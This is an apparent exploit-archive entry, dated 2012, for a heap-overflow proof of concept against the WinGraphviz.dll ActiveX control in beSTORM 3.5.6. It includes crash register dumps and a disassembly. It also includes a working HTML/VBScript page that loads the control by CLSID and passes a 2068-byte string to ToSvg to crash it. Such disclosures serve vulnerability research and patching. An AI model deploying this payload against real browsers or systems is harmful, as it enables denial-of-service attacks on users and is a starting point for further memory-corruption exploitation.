beSTORM 3.5.6 ActiveX (WinGraphviz.dll) Remote Heap Overflow PoC

Свойства

Дата публикации:
15.07.2012
Цель:
beSTORM 3.5.6 ActiveX
Тип воздействия:
Отказ в обслуживании

Код

Exploit Title: beSTORM ActiveX (WinGraphviz.dll) Remote Heap Overflow PoC
Date: July 15, 2012
Author: coolkaveh
coolkaveh@rocketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://www.beyondsecurity.com/
Version: 3.5.6
Tested on: windows 7 SP1
Exploiting the Exploiters
What kind of crappy fuzzer is that ?  
==========================================================================
Registers:
--------------------------------------------------------------------------
EIP 01637FFB
EAX 41414141
EBX 01630000 -> 00905A4D -> Asc: MZMZ
ECX 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EDI 00000000
ESI 00000000
EBP 0013FD24 -> 0013FD34
ESP 0013FD10 -> 0013FD34


Block Disassembly:
--------------------------------------------------------------------------
1637FE9    CMP DWORD PTR [EAX+10],0
1637FED    JE SHORT 01638042
1637FEF    MOV ECX,[EBP+8]
1637FF2    MOV EDX,[ECX+10]
1637FF5    MOV [EBP-4],EDX
1637FF8    MOV EAX,[EBP-4]
1637FFB    CMP DWORD PTR [EAX],0      <--- CRASH
1637FFE    JE SHORT 01638042
1638000    MOV ECX,[EBP-4]
1638003    CMP DWORD PTR [ECX+10],0
1638007    JE SHORT 0163801B
1638009    MOV EDX,[EBP-4]
163800C    MOV EAX,[EDX+10]
163800F    MOV ECX,[EBP-4]
1638012    MOV EDX,[ECX+10]


ArgDump:
----------------------------------------------------------------------------
EBP+8    016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12    016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

============================================================================
<html>
Test Exploit page
<object classid='clsid:684811FB-0523-420F-9E8F-A5452C65A19C' id='fuzzer' ></object>
<script language='vbscript'>

arg1=String(2068, "A")

fuzzer.ToSvg arg1

</script>


или введите имя

CAPTCHA